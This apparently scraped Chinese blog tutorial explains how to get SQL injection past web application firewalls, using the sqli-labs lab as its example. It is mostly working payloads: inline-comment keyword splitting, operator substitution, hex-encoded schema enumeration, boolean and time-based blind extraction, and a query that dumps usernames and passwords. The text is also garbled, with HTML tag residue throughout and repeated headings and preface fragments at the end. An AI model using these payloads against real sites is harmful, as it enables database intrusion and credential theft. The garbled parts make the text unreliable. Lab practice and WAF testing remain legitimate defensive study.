SQL注入WAF绕过技术详解<\/h1>

前言<\/h2>
本文基于sqli-labs第一关字符型注入场景，详细讲解多种WAF(Web应用防火墙)绕过技术。这些技术适用于当标准SQL注入语句被WAF拦截时的绕过场景。<\/p>

基础绕过技术<\/h2>

1. 逻辑运算符绕过<\/h3>

被拦截语句<\/strong>:<\/p>

and<\/span> 1<\/span>=<\/span>1<\/span>
<\/span><\/span>and<\/span> 1<\/span>=<\/span>2<\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>:<\/p>

使用&&<\/code>代替and<\/code>(URL编码为%26%26<\/code>)<\/li>
使用True<\/code>和False<\/code>代替条件<\/li>
<\/ul>
示例<\/strong>:<\/p>
1<\/span>' && 1=1 --+
<\/span><\/span><\/span>1'<\/span> &&<\/span> True<\/span> --+
<\/span><\/span><\/span><\/code><\/pre>2. ORDER BY绕过<\/h3>
传统方法失效<\/strong>:<\/p>
\/*!order*by*\/<\/span>  #<\/span> 已失效<\/span>
<\/span><\/span><\/code><\/pre>有效绕过方法<\/strong>:<\/p>
order<\/span>\/*!60000ghtwf01*\/<\/span>by<\/span>
<\/span><\/span><\/code><\/pre>注意：数字必须大于50000，后面可接任意字母<\/p>
UNION注入绕过<\/h2>
1. UNION SELECT绕过<\/h3>
使用类似ORDER BY的绕过技术：<\/p>
union<\/span>\/*!60000ghtwf01*\/<\/span>select<\/span>
<\/span><\/span><\/code><\/pre>2. 函数名绕过<\/h3>
database()函数绕过<\/strong>:<\/p>
database<\/span>\/**\/<\/span>()
<\/span><\/span><\/code><\/pre>或使用不存在的函数触发报错泄露信息：<\/p>
-<\/span>ghtwf01()  #<\/span> 会报错并显示数据库名<\/span>
<\/span><\/span><\/code><\/pre>信息模式(Schema)查询绕过<\/h2>
1. schema_name绕过<\/h3>
select<\/span> group_concat(\/*!schema_name*\/<\/span>) from<\/span> information_schema.schemata
<\/span><\/span><\/code><\/pre>2. table_name绕过<\/h3>
select<\/span> group_concat(\/*!table_name*\/<\/span>) from<\/span> information_schema.tables where<\/span> table_schema=<\/span>'security'<\/span>
<\/span><\/span><\/code><\/pre>3. column_name绕过<\/h3>
select<\/span> group_concat(\/*!column_name*\/<\/span>) from<\/span> information_schema.columns 
<\/span><\/span>where<\/span> table_schema=<\/span>'security'<\/span> &&<\/span> table_name<\/span>=<\/span>0<\/span>x7573657273
<\/span><\/span><\/code><\/pre>注意：and<\/code>需替换为&&<\/code>(URL编码为%26%26<\/code>)<\/p>
FROM子句绕过<\/h2>
使用from.<\/code>代替from<\/code>：<\/p>
select<\/span> group_concat(username,0<\/span>x7e,password,0<\/span>x7e) from<\/span>. users
<\/span><\/span><\/code><\/pre>盲注技术<\/h2>
1. 布尔盲注<\/h3>
数据库名长度检测<\/strong>:<\/p>
1<\/span>' && length(database\/**\/())=8--+
<\/span><\/span><\/span><\/code><\/pre>数据库名首字母检测<\/strong>:<\/p>
1<\/span>' && (hex(substr((select concat(\/*!schema_name*\/) from information_schema.schemata limit 0,1),1,1))=69)--+
<\/span><\/span><\/span><\/code><\/pre>说明：当ascii()被过滤时使用hex()替代<\/p>
表名首字母检测<\/strong>:<\/p>
1<\/span>' && (hex(substr((select concat(\/*!table_name*\/) from information_schema.tables where \/*!table_schema*\/=0x7365637572697479 limit 0,1),1,1))=65)--+
<\/span><\/span><\/span><\/code><\/pre>注意：数据库名需十六进制编码(如security=0x7365637572697479)<\/p>
列名首字母检测<\/strong>:<\/p>
1<\/span>' && (hex(substr((select concat(\/*!column_name*\/) from information_schema.columns where table_schema=0x7365637572697479 && table_name=0x7573657273 limit 0,1),1,1))=69)--+
<\/span><\/span><\/span><\/code><\/pre>字段值检测<\/strong>:<\/p>
1<\/span>' && (hex(substr((select username from. users limit 0,1),1,1))=74)--+
<\/span><\/span><\/span><\/code><\/pre>2. 时间盲注<\/h3>
当sleep()被过滤时，使用benchmark()替代：<\/p>
1<\/span>' && benchmark(10000000,md5('<\/span>test'))--+
<\/span><\/span><\/span><\/code><\/pre>关键技巧总结<\/h2>

内联注释绕过<\/strong>：\/*!50000任意字符*\/<\/code>格式，数字必须大于50000<\/li>
运算符替换<\/strong>：and<\/code> → &&<\/code>(需URL编码为%26%26<\/code>)<\/li>
函数名分割<\/strong>：database()<\/code> → database\/**\/()<\/code><\/li>
十六进制编码<\/strong>：对敏感字符串如数据库名、表名进行十六进制编码<\/li>
FROM子句特殊写法<\/strong>：使用from.<\/code>代替from<\/code><\/li>
函数替代<\/strong>：

ascii()<\/code> → hex()<\/code><\/li>
sleep()<\/code> → benchmark()<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
这些技术可以组合使用，根据实际WAF的拦截规则灵活调整绕过方式。<\/p>

SQL注入WAF绕过技术详解<\/h1>

前言<\/h2> 本文基于sqli-labs第一关字符型注入场景，详细讲解多种WAF(Web应用防火墙)绕过技术。这些技术适用于当标准SQL注入语句被WAF拦截时的绕过场景。<\/p>

基础绕过技术<\/h2>

UNION注入绕过<\/h2>

信息模式(Schema)查询绕过<\/h2>

盲注技术<\/h2>

前言<\/h2>
本文基于sqli-labs第一关字符型注入场景，详细讲解多种WAF(Web应用防火墙)绕过技术。这些技术适用于当标准SQL注入语句被WAF拦截时的绕过场景。<\/p>